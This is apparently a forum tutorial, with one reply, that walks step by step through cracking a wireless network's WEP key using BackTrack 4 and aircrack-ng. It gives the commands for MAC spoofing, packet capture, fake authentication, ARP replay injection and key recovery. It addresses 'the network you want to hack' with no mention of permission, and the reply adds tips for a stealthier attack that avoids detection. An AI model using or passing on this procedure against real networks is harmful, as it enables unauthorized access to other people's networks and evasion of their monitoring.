Cracking WEP

[Mr-GrayHat]

This chapter will teach you how to crack the WEP of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.

Guide link will go here after being accepted [ here ]

What you will need:

Computer (Windows, Mac, Linux, any OS) Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: http://www.aircrack-ng.org/doku.php?id= ... ard_to_buy) Optional: Flash drive or blank DVD

1. Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.

2. Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor

3. Now type startx and press enter. This will log you into backtrack and you should now see the desktop.

4. Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.

5. type in: airmon-ng

6. Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.

7. type: airmon-ng stop wlan0

8. type: macchanger --mac 00:11:22:33:44:55 wlan0

9. type: airmon-ng start wlan0

10. type: airodump-ng wlan0

11. You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.

12. type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0

13. Keep that window open, now open another command terminal and enter the following in the newly opened terminal:

14. type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0

15. type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0

16. Now go back to the 1st window, you'll notice a number steadily increasing. Once its over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the # is even higher, try again at 15,000 and so on

17. open a new command window and type: aircrack-ng -b (enter bssid) wephack-01.cap

18. You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WEP on the screen :)

NOTES:

Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take awhile for you to get enough packets to crack the WEP.

[Cool_Fire]

It's worth noting that ideally someone should be on the network (as stated).
The more people are actively using the network, the faster you'll be able to capture enough IV's to crack the WEP key.
Additionally, if you want to do a more stealthy attack, you can skip the aireplay steps. These are done to drive up the number of packets sent over the network, but can be detected.